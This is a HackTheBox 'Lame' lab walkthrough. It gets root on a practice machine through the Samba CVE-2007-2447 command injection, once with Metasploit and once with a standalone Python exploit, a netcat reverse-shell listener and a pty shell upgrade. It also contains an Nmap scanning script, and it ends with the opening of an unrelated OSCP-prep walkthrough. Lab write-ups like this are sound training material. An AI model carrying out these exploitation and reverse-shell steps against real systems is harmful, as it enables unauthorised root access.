HTB LAME WALKTHROUGH

HackTheBox is an excellent platform for pen-testers to sharpen their testing skills and broaden their knowledge.

Machine Level - Easy
Machine Name - Lame
Machine OS - Linux
Machine IP - 10.10.10.3

Tools:
Nmap - the standard tool for discovering open ports, identifying services and their versions, and fingerprinting the OS. Any port scanner you are comfortable with (Masscan, SPARTA, etc.) will do for the port-discovery step.
Metasploit - one of the most widely used exploitation frameworks among pen-testers, maintained by Rapid7. Many books cover its features in depth.
We will attack the machine in two ways: with Metasploit and without it.

Methodology 1 (using Metasploit)
Scanning the machine is the first step (i.e. enumeration). We use the following Nmap command,
nmap -sSVC 10.10.10.3

(-sS needs raw sockets, so run the command with sudo if Nmap complains about privileges.)
-sS is a TCP SYN scan, -sV probes each open port for the service version and -sC runs Nmap's default scripts against it. Without -p- the scan covers only Nmap's 1000 most common TCP ports, which is much faster than a full 65535-port scan but can miss services listening on less common ports; on a real engagement follow up with a full-range scan.
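The port-range trade-off above is worth fixing properly on a real engagement. The script below is an added example, not a command from the original post: it does a fast SYN sweep of every TCP port first, then runs -sV -sC only against the ports that came back open, so you get full coverage without paying the version-scan cost on 65535 ports. The parser reads Nmap's grepable (-oG) output; the sample it is exercised on is constructed here to resemble a Lame scan and is not real scanner output. two_stage_scan needs nmap and sudo and only runs when you pass it a target.

```shell
#!/bin/sh
# Added example (not from the original post). Two-stage Nmap workflow:
# 1) fast SYN sweep of every TCP port, 2) version/script scan of the open ones.

# Extract open TCP ports from Nmap grepable (-oG) output on stdin and print
# them as a comma-separated list suitable for -p. Each "Ports:" entry has the
# form port/state/protocol/owner/service/rpcinfo/version/ . Assumes one host.
open_ports_from_gnmap() {
  awk -F'\t' '
    /^Host: / {
      ports = ""
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, list, ", ")
      for (j = 1; j <= n; j++) {
        split(list[j], f, "/")
        if (f[2] == "open" && f[3] == "tcp") out = out (out == "" ? "" : ",") f[1]
      }
    }
    END { print out }'
}

# Constructed sample (not real output) of what `nmap -sS -p- -oG - 10.10.10.3`
# prints, abridged, so the parser can be exercised without a target.
sample_gnmap() {
  printf 'Host: 10.10.10.3 ()\tStatus: Up\n'
  printf 'Host: 10.10.10.3 ()\tPorts: 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)\n'
}

# Stage 1: SYN-scan all ports (raw sockets, hence sudo). Stage 2: run version
# detection and default scripts only against the ports found open.
two_stage_scan() {
  target=$1
  ports=$(sudo nmap -sS -p- -T4 --min-rate 1000 -oG - "$target" | open_ports_from_gnmap)
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  echo "open ports on $target: $ports"
  sudo nmap -sV -sC -p "$ports" -oN "$target.nmap" "$target"
}

# Scan for real only when a target is given; otherwise just show the parser
# working on the constructed sample.
if [ $# -ge 1 ]; then
  two_stage_scan "$1"
else
  echo "parsed sample: $(sample_gnmap | open_ports_from_gnmap)"
fi
```

The filtered 8080 entry in the sample is there deliberately: only entries whose state is exactly "open" make it into the -p list, so the second stage never wastes time on filtered or closed ports.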

We get the following result.


So let's analyse the scan. On a real engagement you must go through every port, but for this box we head straight for the juiciest service, and that is SMB (ports 139 and 445, reported as Samba smbd 3.X - 4.X).
Nmap's banner only gives a version range, so fire up Metasploit (type msfconsole in a terminal) and look up the SMB version scanner with the command search smb_version


You will see one matching module, auxiliary/scanner/smb/smb_version; type use 0 to select it.
Set the target IP with set rhosts 10.10.10.3, then run the module with run (or exploit).
When it finishes it discloses the exact version.
It reports Unix Samba 3.0.20-Debian. Searching for an exploit against that version turns up a Rapid7 module for CVE-2007-2447, the "username map script" command injection that affects Samba 3.0.0 through 3.0.25rc3 when that option is configured.
Link here:
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script


Scroll down to the module's name and load it in msfconsole with use exploit/multi/samba/usermap_script.
As usual, set the target IP with set rhosts 10.10.10.3, check that LHOST is your VPN (tun0) address so the reverse payload can reach you, and run the exploit.


Wait for your exploit to trigger.


The exploit worked and you have a shell. Because smbd runs as root, the command injected through the username map script runs as root as well, so this one shell reaches both flags with no privilege escalation step. On HackTheBox the user flag is user.txt in the user's home directory and the root flag is root.txt in /root.
Here's an example.
For the root flag:

For the user flag:

So that's it for this machine. We were able to get both the root flag and the user flag.

***************************************************************************************************************************

Now we can do this task without using Metasploit.

Methodology 2(without using Metasploit)

The first step is always the same. Use Nmap to scan the host.


In the Nmap results ports 139 and 445 are open, running Samba smbd 3.X - 4.X. The banner only gives a range, but the smb-os-discovery script that -sC runs reports the exact build, Samba 3.0.20-Debian, which falls in the range affected by CVE-2007-2447.
We can search GitHub for a standalone Python exploit for this CVE.
Link here:
https://github.com/amriunix/CVE-2007-2447

We run the script with python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>, where
  • RHOST - the target IP
  • RPORT - the target SMB port (TCP 139)
  • LHOST - your listening IP (the tun0 address on the HTB VPN)
  • LPORT - your listening port


Before running the script against the machine, open a listening port on your side; the payload is a reverse shell, so it needs something to connect back to.
Use Netcat to open the listener (LPORT must match what you pass to the script):
nc -lvnp <LPORT>

After you run the Python script the target connects back to the listener and you get a shell. It arrives without a prompt or job control, so to work in it more comfortably spawn a pseudo-terminal with
python -c 'import pty; pty.spawn("/bin/sh")'
NOTE: pty.spawn runs the shell inside a pseudo-terminal. That is what gives you a prompt and lets interactive programs such as su, passwd and text editors work; the raw netcat shell has no TTY, so those would hang or refuse to run.


Now you can move around the system to collect the root and user flags; as in the Metasploit run, the shell is already root.
Here's the path for the user flag (user.txt in the user's home directory):

And here's the root flag (root.txt in /root):

Both methods gave us the user flag and the root flag.

Thank you!

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named secret.txt